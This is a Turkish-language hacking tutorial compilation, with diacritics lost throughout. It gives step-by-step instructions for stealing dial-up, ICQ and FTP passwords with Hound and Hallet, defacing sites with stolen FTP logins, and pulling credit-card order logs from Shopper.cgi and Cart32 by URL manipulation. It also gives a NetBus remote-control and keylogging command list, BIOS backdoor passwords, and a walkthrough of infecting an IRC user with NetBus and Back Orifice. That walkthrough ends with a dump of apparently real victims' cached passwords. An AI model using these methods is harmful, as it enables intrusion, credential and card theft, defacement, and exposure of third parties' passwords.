adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr grrsek hemen vaz geeriz nk hotmail, yahoo gibi deil nasl hackleriz diye dnrz ??.. Yine gideriz mehmet.com a whois ekeriz bi bakarz aaa mehmet.com un maili hotmail.. :)) Hotmaili hackleriz mehmet.com u zerimize geiririz ve ahmet@mehmet.comBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr eklinde bir mail yaratp o icqyu alabiliriz :))

HOUND VE HALLET GIBI SPER PROGRAMLAR VASITASIYLA PWL ICQ VE FTP SIFRELERIN ELE GERME
GEREKL PROGRAMLAR: HOUND PROGRAM HALLET PROGRAMI PWL TOOL PROGRAMI ICQCRAK PROGRAMI Evet arkadalar daha nce manuel olarak pwl ve cq ifrelerinin nasl ele geirileceini anlatmtk. Manuel yntemle renmek ok nemliydi. nk hack olaynda ezbere i yapmak pek iyi deildir olayn mantn kavramak nemli. PROGRAMLARI NASIL KULLANIRIZ. HALLET PROGRAMI: ncelikle ayarlar blmnde kaynak paylam c olarak kalacak hedef dizin pwl dosyalarnn bilgisayarmza kopyalanaca adres rnek c dizininde klasr oluturalm ve adn pwller koyalm. HEDEF DZN: c:\pwller olacaktr. bu porgramn dosya gnderdiini ben grmedim sanrm o blmnde sorun var ama genede yazmak isterseniz gndermek istediiniz bir dosya ismi yazabilirsiniz veya aynen kalabilir ayarlarmz yaptk TARAYICI MODUNA GELYORUZ VE BR P ARALII YAZIYORUZ OK BYK ARALIKLAR VERMEYN BLGSAYARI KLTLEYEBLYOR EN FAZLA 15 P ARALIINDA KALSIN PORT KISMINI 1243 YAZABLECEMZ GB 139 DA YAZABLRZ. YAPILACAK LEMLER BLMNDE HEPSN ARETLYORUZ VE LEM BALATA BASIYORUZ ok ksa bir zaman dilimi iinde share kullanma ak bilgisayarlardan bir sr pwl cq nadirde olsa ftp ifrelerini tespit ediyor ve belirlediimiz klasre kaydediyor. HALLET: Hallet Program iin Rx3 program vastasylo eer programnz elinizde yoksa indir: download blmnde essantial de olabilir My Webpage belirli bir aral taratarak share bilgisayarlar tespit ediyoruz ve hallet programnnn ip blmne giriyoruz. keylogger gndermek isteniyorsa keylogger gndere basyoruz keylogger gnderiyor keyloger txt indir dediimiz zaman gnderdiimiz keyloggerleri okuyor yanlz kar pcnin yazmaya ve silmeye kar gvenlii olmamas gerekir.Hallet programnn en nemli zelliklerinden biri dizin grntleyle kar pcye seri bir biimde dalmas yani bilgisayara girer. PWL NDR: ok ksa bir zaman iinde btn pwl leri bulur ve ve kendi klasrne ip numaralarna gre kopyalar halletin bu zellii mkemmel. Bulamazsa sesli mesaj verir bulurken daha deiik sesli mesaj verir FTP indir:kar pcde varsa ftp ifserelerini bulur ve kopyalar. K ADET MTH PROGRAM FRELER PROGRAMLAR KAYDETT NASIL AACAIZ

pwl ifrelerinin zerine iki kez tklarsak pwl tool program hemen nmze geliyor searchPasswordFast butonuna basyoruz hoop btn ifreler nmzde. Bu kadar basit. PEK ICQ FRELERN NASI AACAIZ ICQcrack porogramn ayoruz.En soldaki buton openICQ dadabase ye basyoruz cg ifrelirini c:\pwl ler dosyasna kaydetmitik hemen c yi arattrp o dosyay buluyoruz karmza open file geldi open feledeki ICQ numarasnn zerine tklyoruz a diyoruz hooppppp ICQ FRES HATTA VE HATTA KULLANDII VERSYONU KARIMIZDA evet arkadalar bu programlar vastasyla dial up ve cq ifre elde etmek ok kolay ve ksa bir zaman iinde yzlerce pwl ve cq ifreleri elde edebilirsiniz. KOLAY GELSN

HOUND PROGRAMIYLA WEB HACK


hound program ayarlara geliyoruz Hedef Dizin:c:\Belgelerim yazyoruz dier hi bir ayarla oynamyoruz arpya basp kyoruz.Tarayc modunda FTP yi iaretliyoruz ve youn ip aralklarndan birini veriyoruz mesela Trkiyede en youn ip aral 195.175.50.1 195.175.255.255 bu ttnet ip aralrdr siz daha baka iss ip aralklar taratabilirsiniz. p tarama bittikten sonra belgelerime bakyoruz sm.data diye bir dosya kaydetmimi. Eer byle bir dosya kaydetmise o dosya ftp.dat dosyasdr.Ve web sitesiyle ilgili ifreler mevcuttur. Evet sm.data dosyasn bulduk. imdi cuteftp programn download ediyoruz F4 basyoruz nmze import diye bir men geldi. mporta tklyoruz importtan belgelerime geliyoruz belgelerimdeki sm.datann zerine bir kez tklyoruz, a diyoruz a dediimiz anda cute ftp programna o siteyle ilgili tm bilgileri dkt. Site ftp.adresi site ftp ifresi. Connecte basyoruz ve o siteye balanyoruz. stersek bu siteyi annda hackliyoruz. stersek hostunu smartvhois le hostunu bulup ftp ifresini deitiriyoruz. ve siteyi istediimiz biimde hackliyoruz. Daha nceden kendimize gre hazrladmz bir index.htm dosyasn siteye yklyoruz. Sitenin ieriini ister siliyoruz ister silmiyoruz. O tamamen sizin insiyatifinize kalm. Bu zamana kadar hi site hacklemedim site hacklemek istiyorum diyenler iin en basit hack yntemi budur

GENEL WEB HACK YNTEMLER VE GVENLK YOLLARI


--- Bilgisayar Bilimde Gvenlik Ana Bilim Dal --Yazma balamadan nce size baz gereklerden bahsetmek istiyorum. zellikle gerekten bilimsel anlamda bilgisayar sektr ile ilgilenmemiseniz, bu syleyeceklerim sizin iin altn deerinde olacaktr. 1. Kural : Hibir Hacker yada Saldrgan, sihirbaz deildir. Bir ekilde var olan bir ak varsa, o saldrgan, bilgi, yetenek, tecrbe ve ans kriterleri ile o a bulur ve kullanr. Her saldrganda bu kriterler

ayn olmayaca iin bazlar iin atak baarsz olur, bazlar iin ise atak kar tafa byk hasarlar verir. 2. 3. Kural : Tamamiyle gvenli sistem diye birey yoktur. Kural : Gvenlik iinde garanti yoktur.

Bu kurallar gerekten altn niteliinde. Eer ki bunlarn doru olduunu bilerek dnrseniz, yaptnz ilerde ve yapacanz yorumlarda bir ok eyi kolayca elde edersiniz.

nternet ortam, bir ok bilgisayarn, farkl protokoller zerinden birbirine baland, byk bir paylam adr. Bunu sylememin sebebi, satrlarm doldurmak iin deil. Burdaki nemli bir eyi vurgulamak iindir. Az nceki cmlede Paylam denilen bireyden bahsettim. Evet, ineternette bulunan her bilgisayar bir paylam iindedir...

imdi ksaca internette bir web sitesi iin gereken birimlerden bahsedeceim.

Domian Name: Alan addr. rnein, www.spymastersnake.org bir TopLevel domaindir. Spymastersnake.org ksm domainin addr. *.org ksm domainin hangi level olduunu belirtir. www.* ksm ise, domainin gsterdii Ipdeki www klasr veya hizmetinin yoludur. Domain Name her zaman bir Ipnin yerini alr. Bu IP ise bir bilgisayara ait olan, ve o bilgisayarn internete eriimini salayan numaradr. Her internete balanan makinaya verilen ve birbirinden farkl olan bu numaraya, internet protokol numaras denir.

Host: nterenete srekli bal olan, belli bir ipsi olan ve iinde internette yaynlanacak dosyalar barndran, multi-user iletim sistemi barndran ve farkl kullanclarn, biribirinden bamsz kullanabilecekleri bir bilgisayardr. Eer siz kendi bilgisayarnza bu iletim sistemlerinden birini kurup, makinanz ayarlarsanz bu makine sizinki bile olabilir.

Bu makinalarda web sunucusu dediimiz programlar bulunur. Bu programlar sayesinde sizin herkese paylama aacanz internette yaynlayacanz sitenin dosyalarn 80 numaral port zerinden yada baka bir port zerinden web tarayclarnn okuyabilecei ekilde yaynlanabilir.

Bir web sitesi aldnzda, aldnz yer size bir bilgisayarda hesap aar. Bu hesap sizin dosyalarn koyabileceiniz bir hesaptr. Bu hesap sayesinde size izin verilen eyleri yapabilirsiniz. rnein izin verilen miktarda dosyalarnz koyabilir, yaynlayabilir veya kar makinede dosyalarnz altrabilir, irc server gibi eyler kurabilirsiniz. Yada u anda geocities gibi

yerlerin yapt sadece dosyalarnz depo edip, yaynlanmasn salayabilirsiniz. Yani bu web yaymclnn en temel ve basit iini yapm olursunuz.

Ancak web yaymcl daha karmak ve daha ok ekilde yaplabilmekte. Bunlar salayan eylerin banda script dediimiz, web browserlarndan yollanan komutlarla kar makinada alan uygulamalardr. Bir script, snrlandrlm bir *.exe uygulamas gibi alr. Belli bir yorumlaycs vardr ve tm grevleri bu yorumlayc yapar. Scriptte ise bu yorumlaycnn anlayaca komutlar vardr. Bu yzden yaptnz uygulamann snrlar bu yorumlaycnn yeteneklerine baldr. Bilinen en yaygn yorumlayclar ASP, PHP ve Perl yorumlayclardr.

Ayn ekilde size verilen bir hesapta, baz normal *.exe uygulamalar yada ortamna gre sadece uygulama altrabilir, bunlarla oyun serverlar, chat serverlar kurabilirsiniz. Elbette bu aldnzn hostun yeteneklerine baldr.

Bylece internete bal bir bilgisayar baz server uygulamalar sayesinde internette bilgi paylaabilen bir sistem haline getirip, adna web sunucusu yada host demi oluyoruz. Bir host iinde yzlerce kullanc ve buna bal olarak yzlerce web sitesi barndrabilir. Bunun byle olmas salayan ey ise Domain Name Server dediimiz sistem ve Multi-User dediimiz, iletim sistemleridir.

Ksaca bilmeyenler iin, bir web sitesi iin gereken bir server yazlm ve internete bal bir bilgisayar diyebiliriz. Ancak gerekte durum daha Complex bir haldedir. Bu complex yerleim ise bu sistemleri iyi bilen kiiler iin baz avantajlar salamakta ve bakasnn sahip olduu sistemlere bile onlarn istemleri dnda hkmetme ans vermektedir.

imdi ksaca u anda Trkiyede Hack ad altnda dolaan, insanlarn Hack ettim diyerek vnd basit ve karmak olmayan sistemleri aklamakta. Bunlarn balcalar unlardr: 1. Mass Scannerlar: En yaygn olan son dnemde budur. Baz scannerlar, internetteki ipleri yani bilgisayarlar tarayarak, onlarn paylam izni olup olmadn ve ftp gibi protokolllerinde eriim izinlerine Anonymous kullanclara izin verip vermediini ksa zamanda tarayp bulan scannerlardr. Netbios ve Vulnerability scanner diye bir ka trleri vardr. Kullancnn bilgili biri olmas gerekmez. Tek yapaca ip araln girip tarama yapmasdr. Ayn ekilde scriptlerdeki aklar ve hatalar bulmak hazrlanm scannerlarda vardr. Bunlarla mesela, internette bulunan Al-Veri scriptlerinin bilinen aklar veya Permission ayarlar hatalaryla kredi kartlar bilgilerine ulam yaplmaktadr. Olduka kolay ve basit bireydir. Bir mass scanner ok iyi Up ve Down stream balantya

ihtiya duyar. DSL ve Tx balantlar biilmi kaftandr.

Eer internette gecede 100-200 site hack ettik yada saatte 1000 site hack ettik gibi eyler grrseniz, bunlarn Mass toolarla sadece butonlara baslarak yapldn rahatlkla syleyebilirsiniz. zellikle bu hack edilen sitelerin bir ortak yan olmaz. Dielim bu 1000 siteyi hack etmi adama 1 site adresi verseniz onu hack edemediini grebilirsiniz. nk kendi rastgele belli ip aralklarn tarayarak bu ii yapmtr, belki hack edilen sitelerin adn kendi bile daha nceden duymamtr. Diyelimki sadece Amerikan sitelerini hack edicek biri, Amerikan hostlarnn bulunduu ve bulunabilecei, belli Amerikan IP aralklarn tarama yapar ve iinde aklarn olduu siteleri bularak ilemi yapar. Bylece saatte balant hzna gre 1000 Amerikan sitesi hack edebilir. Ancak bu sitelerin ou uyduruk kiisel siteler olacaktr yada kendi abasyla hosting hizmeti vermeye alan deneyimsiz insanlarn siteleri olacaktr.

Baka bir ekilde de saatte yzlerce site hack etmek mmkndr. Bunun iin atak yapan ahs, iinde yzlerce hesabn bulunduun bir Hostun an bulup, Root, Admin konumuna yada yetki dzeyi olacak bir konuma erimi ise tm hesaplar kitleyebilir yada hesaplarn indexlerine eriim varsa, hazrlayaca ufak bir uygulama ile tm indexleri deitirebilir. Diyelim ki permission ayarlar yaplmam ve tm kullanclarnn Home klasrleri chmod 777 gibi bir izinle hazrlanm bir hostta, aacanz yada alacanz bir hesapla, bir script yazmanz yada hostun iletim sistemine gre bir uygulama yazmanz sonucunda, tm klasrlerdeki indexleri deitirip, sistemi hack edilmi havasna sokabilirsiniz. Bu ii eer hostta 1000 site varsa, hepsine yapm ve ayn anda yzlercesini hack etmi olursunuz... Bu verdiim rnek bile en azndan yetenek isteyen bir rnektir ancak yukarda verilen tool rnei herkesin yapabilecei ve hali hazrda tm hack sitelerinin kullanclarn gzn boyamak ve kendilerini tatmin etmek iin kullandklar yntemdir. Bilgisayar bilimi hakknda bilgisi olmayan kiiler ise bu insanlarn arkasndan gitmeye almakta ve onlarn alarna dmektedirler. Unutmayn ki bu i sihirle yaplmyor. Size mant aklanmam hibir hack giriimini gerek sanmayn.

2. Fake Yollarla: zellikle bedava siteler datan geocities gibi yerlerden sitesi olan kiilerin sitelerini almak iin kullanlan yntemdir. Kiinin mail adresine sahte ifre isteyen mailler yollanr yada usern hesabnda ifreler denenir. Hi biey yapamayan lamer siteyi ikayet etmekte bulur areyi. Eer User ile bir chat ortamnda balants varsa ona bir Trojan yada Keylogger yollayarak ifreyi almaya alr. nternet kafe gibi ortamlarda user ve oturduu makineleri takip ederek ifreyi almaya alr. Buda ok kullanlan bir yntem. Her zamanki gibi bilgisayar bilimi ile ilgisi olmayan kiilerin yolu veya karsndaki user bilgisi az olunca denen yoldur.

3. Script Aklar: Bilinen scriptlerin aklaryla, sistemdeki bir ifreye ulaarak yaplan yntemdir. rnein bir forum scriptinin admin ifresini ele geirip, bu ifreyle sistemin dier yerlerine ulap, forumun anasayfasn deitirme, ifre FTP ifresiyle ayn ise siteyi

ele geirme gibi, bilinen ve hala kullanlan yntemlerdir. Bunlar iin bir rnei 2001 ylnda yazp yaynladm kredi kartlarnn alnmas ile ilgili bir yazdan alnt yaparak vermek istiyorum bu rnek Permission aklar ile ilgili blm iinde geerlidir.: ..........te Log Kurulumlarndan doan aklardan kan riskler... Bu yntemde zor olan tek bir yer var o da CClerin hangi program tarafndan alnp log edildiini bulmak. Program bulduktan sonra ise ona baz parametreler girerek onun log dosyasn bulmak. Zor deil, kolay. Baz web siteleri bile bu yntemlerle hack ediliyor. Yaplmas gereken ey scripte baz parametreler girerek istenene ulamak. imdi, ilk i kytrk ama CC ile alveri yaplan bir site bulmak ve bu sitenin CC verilerinin girildii alana gitmek. Karnza CClerin girildii form alan gelince kayna grntleyip, iindeki POST methodunun bulunduu yere bakn. Diyelim ki u an zaten alan ve aktif olan http://www.xxxx.com/cgi-local/shopper linkini POST verisinin yollanaca yerde buldunuz. te o zaman bu durumda ans dileyip unlar deneyin: Orda yazan URLyi kopayalan, eer URL yerinde "/cgi-local/shopper" yazyorsa bana sitenin adresini koyun, yani http://www.xxxx.com daha sonra URLyi browsernzn git ubuuna yaptrn. imdi LOG'u bulmaya alcaz, ilk nce bu adrese u TAGlar ekliycez, http://www.xxxx.com/cgi-local/shopper?search=action bu sayede scriptten bir arama yapmasn istiycez. Tabii ki arycak ama ne? tabii ki ufak bir keyword, arama yapmamzn nedeni, log'u grntlemek iin baka ansmzn olmamas. nk log'u print edecek bir girdi giremiyoruz, bunun iin her zaman otomatik print yapan search tagn kullanyoruz. Bunun stne bir keyword girdisi ve stne de aranacak harfleri giriyoruz www.xxxx.com/cgi-local/shopper? search=action&keywords=yeye u an yeye yazdk ve yeye kelimesini aratmaya baladk ama nerde; Bunun iin asl kark olan ksm yapcaz ve yaplan alverilerin nerede LOGlandn bulucaz. te bu durumda devreye zeka giriyor ve denemeye balyoruz. www.xxxx.com/cgi-local/shopper?search=action&keywords=yeye %20&template=sales.log diyoruz. Burdaki %20 boluk anlamna, template ise aranacak ktphane anlamna geliyor ve tabii ki sales.log ise aranacak olan dkman. Deniyoruz ve tabii ki olmuyor nk sales.log yok. O zaman devam ediyoruz ve oraya sales.log yerine sale.log yazyoruz deniyoruz, olmazsa sell.log yazyoruz, olmazsa order.log yazyoruz ve tatam, oldu te btn log karnzda, yada yle diyim, btn log deil yanlzca iinde yeye kelimesi olanlar karnzda... Yukarda anlatlrken kullanlan taglar deiebilir. Mesela, ?search=actin yerine ?action=search olabilir. yada direkt ? search de olabilir bunu bilmeyeiz bu yzen deniycez. Mesela keywords yerine keyword de olabilir. Sonu URL www.xxxx.com/cgilocal/shopper?search=action&keywords=yeye %20&template=order.log u ana kadar anlattm Shopper.Cgi iin olan akt. Birde Cart32.exe gibi windows iin hazrlanm olan scriptin a var. Onun hack edilmesi daha kolay.Cart32 kullanan bir sitede http://www.michaeljackson.com/cgibin/cart32.exe olarak scripti bulduunuzda, bunu http://www.michaeljackson.com/cgi-bin/cart32/herhangibisi-ORDERS.txt yada

OUTPUT.txt olarak girerek CClere ulaabilirsiniz. Tabii dediim ORDERS baka bii de olabilir ama genelde orders dr.

ESSANTAL NET TOOLS KULLANIMI


Essantial net tools kullanma ak share bilgisayarlara kolayca girmek te kullanlan bir programdr. Bu tr dier programlara gre hem daha seri hemde herkes kolaylkla bu program sayesinde share bilgisayarlara girebilir. Bilgisayarlara girebilmemiz iin sadece bu program download etmemiz yeterli deil. ncelikle a ayarlarmz yapmamz gerekiyor. A ayarlarnn nasl yaplaca Hack blm Angr ip Scan kullanm blmnde resimli ve ayrntl bir biinde akland. ncelikle Angr ip scan aklamasndaki a ayarlarn resimdeki gibi aynen yapyoruz.Aadaki resimde grlecei zere NB Scan blmn seerek aadaki starting ip adres blmne balang ip no.su Ending ip adrez blmne ise biti ip. nosunu yazyoruz. Starta basyoruz ve kullanma ak ve kapal bilgisayarlar listelenmeye balyor.RS yazan ksmda Yes olanlarn zerine tklyoruz. No yazanlarla hi uramyoruz nk kullanm verilmemitir.Daha sonra sa tua basyoruz ve Open Computer i seiyoruz.5 saniyelik bir beklemeden kar bilgisayarla balant kurulmu oluyor.

<!--[if !vml]-->

<!--[endif]-->

kar bilgisayarla balant kurulduunda aadaki resimdeki gibi c d simgeler ekrena gelirse ne ala c nin zerine iki kez tklyoruz ekran donmu gibi oluyor, alncaya kadar beklememiz gerekiyor. Tam kullanm vermi balyoruz bilgi paylamna. Hahahahahahaha. nedense canm birden glmek istedi.

<!--[if !vml]--><!--[endif]-->

<>

baz bilgisayarlarda c d dizinleri grnr ift tkladnzda karnza ifre ekran gelir, bazlarnda hi bir ey grnmez pc i ifrelidir. Bazlarnda sadece yazclara paylam vermitir. Bazlarnda sadece mesala mp3 download veya dinleme iin izin verilmi olabilir. Bazlarnda bilerek veya bilmeyerek tam yetki verilmitir. Bizim iin nemli olan bilgi paylamdr. Burada verilen bilgiler eitim amaldr. Zarar vermek size hi bir ey kazandrmaz. Uyarmak ise ok ey kazandrr. Bilinsizce bilgisayarn kullanma aanlar ltfen uyarnz. Avrupadaki pc lerin ou kullanma aktr.Sadece bilgi alveriinde kullanrlar. Kimse zarar vermekle uramaz. Ltfen bu sylediklerimi dikkate almyorsanz bu siteyi terkediniz.

COMMVIEW PROGRAMI

]-->

<!--[endif]-->

CommView porogramnn bir ok zellii mevcuttur.Kullanm gayet basit olup hangi sitenin zerinde aarsanz an o site hakknda bir ok bilgilere eriebilirsiniz.rnein o anda sitenin kulland ipadresileri ve portlar eer oyun sitesi zerinde atysanz serverin msade ettii snrlar dahilinde kiilerin konumalar, ip numaralar ve daha birok bilgiye ulaabilirsiniz. program altrmak iin filenin altndaki simgeyi tklayn program almaya balar. Programda birok zellik bulunmasna ramen sizin iin daha oknemli olan ksm PACKETS blmdr . Resimdede grld gibi TCP/IP lerin zerinegelerek tklyoruz ekrandakilerin tamamn tklayarak seiyoruz (seebildiimiz kadar) setiimiz ksmnzerindeyken sa tua tklyoruz ekrandaki kk pencerede grld gibi saReconstruct TCP sessioun u tklyoruz. Programn o an tespit ettii tm bilgiler karmzageliyor.

<!--[if !vml]-->

<!--[endif]-->

Resimde de grld zere programn tespit ettii bilgiler hemen ekrana geliyor

TELNETTEN NETBUS KOMUTLARI


Burdaki komutlar Netbus' kullanmay sevmeyenler icin telnetten netbus komutlar..Sahsen ben netbus kullanmyorum.. AppRedir;(path:\filename.exe); e uzerinden program calistirir. c:\command.com;100 CaptureScreen Ekrandan goruntu alr DelFile;(filename.exe) Dosya siler DisableKeys;1;(keys) harfleri iptal eder [kullanc klavyeyi kullanamaz] DisableKeys;0; Klavye tekrar aktif olur DisableKeys;1;abcdefghijklmnopqrstuvwxyz Harfler kullanlmaz hale gelir DownloadFile;(path:\filename.exe) istediginiz dosyayi cekersiniz Eject;1 CD-ROM'u acar Eject;0 CD-ROM'u kapar ExitWin;1 Windos'u kapar GetApps Calsan prg.lar listeler GetACL Admin Listi verir GetInfo Info penceresini verir GetDisks Hardiskindeki dosyalar gosterir GetSetup Server icin ayarlar verir GetUser Kullanc hakknda bilgi verir GetVolume Sesi acar KeyClick;1 Key click on KeyClick;0 Key click off Listen;1 Start (keyboard) bir nevi keyloger adamn yazdklarn gorursunuz Listen;0 Stop listening Message;(message) Messagebox halinde mesaj yolalrsnz NewSetup;serverport;1;password;youremail;VICTIMSemail;smtpserver Sends the new admindata (1.7) Password;1;any ENTER'a bas ve ServerPwd;yenisifre Passwordu deistirir(1.6) PlaySound;(file.wav) wav dosyas calar

PortRedir;(listen tcp port);(ip);(destination port) Redirect the specified port Record;10 = 10 saniyelik ses kaydeder RemoveServer;1 Server' kaldrr RemoveServer;0 Kaldrmay iptal eder ShowImage;(file.exe) Resim gosterir SendKeys;(words) Mesaj yollar * tusu ile yazdgnz siler SendKeys;2;13 Sends ozel tuslar [sag,sol,yukari,asagi] SetACL;(ip)| Set (admin) access IP`s SetMousePos;(xpos);(ypos) Mouse'u oynatrsnz SwapButton;1 Mouse'un tuslarnn yerlerini degistirir SwapButton;0 Mouse'u eski haline getirir StartApp;(file.exe) Program calstrr UploadFile;(file.exe);(size);(destination dir) Dosya yollarsnz URL;(www.gnderileceksayfa.com/) yazlan sayfaya gider

BiOS FRELER ve BOS FRES KIRMAK


BIOS ifrelerini konusunu biraz aratracak olursak.. bilmeyenler iin Krlmas en zor ifrelerden biridir.. ncelikle bilmeyenler iin syleyim BIOS Password bilgisayarnz henz alma aamasndayken karnza kan ifredir. Peki bundan nasl kurtulacaksnz. ok kolay.. ama gizli bir i iin yapacaksanz mesela hrszlk falan.. zaman alacaktr.. nce kasay amanz gerekecek daha sonra BIOS pilini kasadan 5dk lna ekin.. bilgisayar 5dk sonra altrdnzda BIOS ifresi sormayacaktr. Yada baz Boardlarn BIOSlarndaki zel Jumperlardan yararlanabilirsiniz. Ancak bazende BIOS passwordlarn Board`un ilk kullanld gibi kalr.. Bilgisayar sahibi ifreyi bildii iin deitirmez yada deitirmeyi bilmedii iin denemez.. Peki bunlarn ifreleri nelerdir. Bu ifreler BIOSun trne gre deiir ben bazlarn en sk retilenler srasna gre verim AWARD BIOS alfaromeo AW AWARD AWARD_PS AWARD_PW AWARD_HW AWARD_SW

AWARD PW AWARD SW _award awkward j64 j256 j262 j322 01322222 589589 589721 HLT SER SKY_FOX Syxz aLLy CONCAT TTPTHA aPAf HLT KDD ZBAAACA ZAAADA ZJAAADC djonet AMI BIOS: AMI ami bios setup cmos AMIDECODE A.M.I. AMI SW AMI_SW BIOS PASSWORD HEWITT RAND Oder A.M.I. AMI!SW AMI?SW HEWITT RAND alfarome efmukl ( ite schoolbusn ifreside burdan alnmtr. ) Phoenix: phoenix Compaq: compaq Tinys: Tiny Baz Dier BIOS ifreleri:

LKWPETER lkwpeter BIOSTAR biostar BIOSSTAR biosstar ALFAROME Syxz Wodj PASS PASSOFF CONDO J64 BIOS SETUP CMOS admin system <!--[if !supportLineBreakNewLine]--> <!--[endif]-->

KARI BLGSAYARA GRME


Bu bolumde, baskalarnn bilgisayarna girme ve internet sifrelerini calma olaylarn ogrenicez.. lk olarak bu olaylar gerceklestirmek icin 4 adet programa ihtiyacimiz var..Wingate, Netbus,Bo, Telnet(her windowsun icinde vardir)..Diger programlari lk olarak irc'de kendimize bir kurban secip, ip numarasn alyoruz (/dns nickname).. Sonra wingate'i calstryoruz.. "Hostname or Ip" yazan yere kurbanmzn ip numarasn giriyoruz.. "Scan Port" ksmnda 23 seklindeki rakamlar 12345 yapyoruz sonra asagdan 3. secenek olan try to open the port only" i secerek "scan!" butonuna basyoruz.. "Servers found" ksmnda bir kac tane ip yazmas lazm sansa bir tanesini secin.. Sonra netbus' calstrp hostname/ip yazan yere wingateden buldugunuz ipyi yazn.. Sifre isterse telnetten sifreyi krmamz lazm..Eger sifre istemezse isiniz kolay... Ben sifre istedi varsayyorum ve anlatmaya devam... Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup calstrn... Baglana gelip uzaktaki sistem'e tklayn... Ana bilgisyar ad: wingatede buldugmuz ipyi yazyoruz Baglant Noktas ksmna ise netbus portu olan 12345 yaziyoruz..baglana tklyoruz.. yukarda netbus 1.6 veya 1.7 yazar.. simdi sifreyi kirmak icin Password;1;123 ServerPwd;cehennem bu yazy pasteliyoruz...ve sifre cehennem oluyor,siz sifreyi cehennem yerine baska bir seylerde yapabilirsiniz..

Sonra bir daha netbus'a gidiyoruz artk sifre cehennem giriyoruz...Artk adamn bilgisayrndayz.. file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye yolliycagimizi soruyor.. c:\windows yazarak windowsun altina atiyoruz yolladiktan sonra download ewkrann kapiyoruz.. start program diyoruz...c:\windows\boserve.exe diyoruz... tamam netbustaki isimizde bitti..

imdi Back Orifice'ye geiyoruz target host:porta adamn ipsini yazyoruz..yan tarafada 12345 yan taraftan system passwordsu secip send e basyoruz ve bingoooo bu admda 10un ustunde password varmis.. Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm.. bu arada adamdan cikan passler

** 0:Ping host packet sent (19 bytes) val1: '' val2: '' ---------- Packet received from host 194.242.78.148 port 31337 --------!PONG!1.20!WINDOWS! ------------------------- End of Data ------------------** 1:System passwords packet sent (19 bytes) val1: '' val2: '' ---------- Packet received from host 194.242.78.148 port 31337 --------Password cached by system: index:02(06) len:34(20/52) Resource: 'crypt_Blizzard_Storm' Password: 'P' index:09(19) len:52(41/22) Resource: 'www.schoolgirls.com/restricted directory' Password: ':' index:13(19) len:50(31/102) Resource: 'www.sexxxfarm.com/members only' Password: 'burp:burp' index:25(01) len:28(07/122) Resource: 'WINDOWS' Password: 'PAKSOYKAROLA' index:00(06) len:74(53/122) Resource: '*Rna\AT&T WorldNet Service@000000@worldnet.att Bu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr' Password: 'aaaaaaaaaaaa' index:04(06) len:68(50/92) Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup9,' index:07(06) len:44(27/82) Resource: '*Rna\Turk Nokta Net\abaygan' Password: 'need-bob' index:08(06) len:38(25/52) Resource: '*Rna\Turk Nokta Net\burak' Password: 'burak' index:10(06) len:22(14/02) Resource: '*Rna\sol\amnk' Password: '*' index:05(06) len:42(27/72) Resource: '*Rna\Turk Nokta Net\necatit' Password: 'eynesil"' index:11(06) len:34(19/62) Resource: '*Rna\Alnet\ersinari' Password: '987199$' index:15(06) len:36(21/62)

Resource: '*Rna\Burak\rbayraktar' Password: '963963' index:16(06) len:42(27/62) Resource: '*Rna\Balantm 5\rbayraktar' Password: '963963.$' index:17(06) len:36(19/82) Resource: '*Rna\Burak\r1056700' Password: 'DABmvsVG(' index:18(06) len:40(19/122) Resource: '*Rna\Burak\doganalp' Password: 'alpdogan<BR>' index:19(06) len:18(10/02) Resource: '*Rna\nolur' Password: '$' index:20(06) len:36(19/82) Resource: '*Rna\Burak\b1000025' Password: 'ncVCjYFu ' index:06(06) len:32(16/82) Resource: '*Rna\ADATA\suen' Password: '68913672$' index:22(06) len:36(22/62) Resource: '*Rna\Balantm 4\merko' Password: 'merko7.' index:21(06) len:46(25/122) Resource: '*Rna\Balantm 7\ baycenk' Password: 'gizlikorkunc' index:23(06) len:28(19/12) Resource: '*Rna\bayrak\baycenk' Password: ' -' index:14(06) len:30(16/52) Resource: '*Rna\Burak\burak' Password: 'burak-' index:12(06) len:30(16/62) Resource: '*Rna\Alnet\merko' Password: 'merko7&' index:24(06) len:38(17/122) Resource: '*Rna\cenk\baycenk' Password: 'paksoykarolaa' index:01(04) len:18(05/52) Resource: 'MAPI' Password: 'MAPI' index:03(19) len:14(04/12) Resource: 'NNTP' Password: ':' End of cached passwords. Unable to read value 'ScreenSave_Data' ------------------------- End of Data -------------------

BACKORIFICE VE KULLANIMI
Karsi pclere saldirmak iin yapilmis bir program. Program hem cok basit kullanimi bunun yaninda ok islevli olmasi en byk zelligi. Backorifice sayesinde karsi pc nin internet sifresinden.... ekran koruyucu sifresine kadar bir ok sifresini alabilirsiniz. Pc ye reset atabilir.Dosyalari zerinde istediginiz degisikligi yapabilirsiniz... Sitemden ekmis oldugunuz backorifice daki dosyalari taniyalim ; Boserve.exe: Server programi. Yani karsi pc ye yollamamiz gereken dosya. Bogui.exe: Kendi kullanacagimiz dosya. Bocilient.exe: Programin dos versiyonu (ben bunu tavsiye ederim) Boconfig.exe: Programin ayarlarinin yapildigi dosya Nasil Baglanacagim? Karsi pc ye server dosyasini atirdikdan sonra Command bolumunden ping host 'i seiyoruz ve send e tikliyoruz. Baglandigimiza dair biseyler gelirse (merak etmeyin eger baglanirsaniz mutlaka anlarsiniz unlemli 3-4 satir bi yazi cikar)

kisinin pc sindeyiz demektir neler mi yapabiliriz? Directory List: Klasrleri listeler unused (soldaki) bolume yolu yaziyoruz. Directory Create: Klasr olusturur. Unused (soldaki) blmne olusturulacak klasoru yazin. Directory Remove: Klasr siler. Unused (soldaki) yolu yazin. File Copy: Dosya kopyalamak iin Unused (soldaki) 'e kaynak dosyayi. Unused(sagdaki) 'e hedef dosyayi yazin. File Delete: Dosya silmek iin. Unused (soldaki) dosya adini yazin. File Find: Dosya bulmak iin. Keylog Begin: Kayit dosyasi. Unused (soldaki) 'e dosyanin adini yazin. Mm Play Sound: Wav dosyalarini caliltirmak iin. Unused (soldaki) dosyanin adi ve yolunu yazin. Syetem Dialog Box: Mesaj iin. Unused (soldaki) 'e mesajinizi Unused (sagdaki) mesaj kutusunun basligini yazin. System Info: Pc nin sistemi hakkinda bilgi verir. System Reboot: Reset attirir Tcp File Recieve: Dosya indirmek iin. Unused (sol) a dosya adi unused (sag) hedef 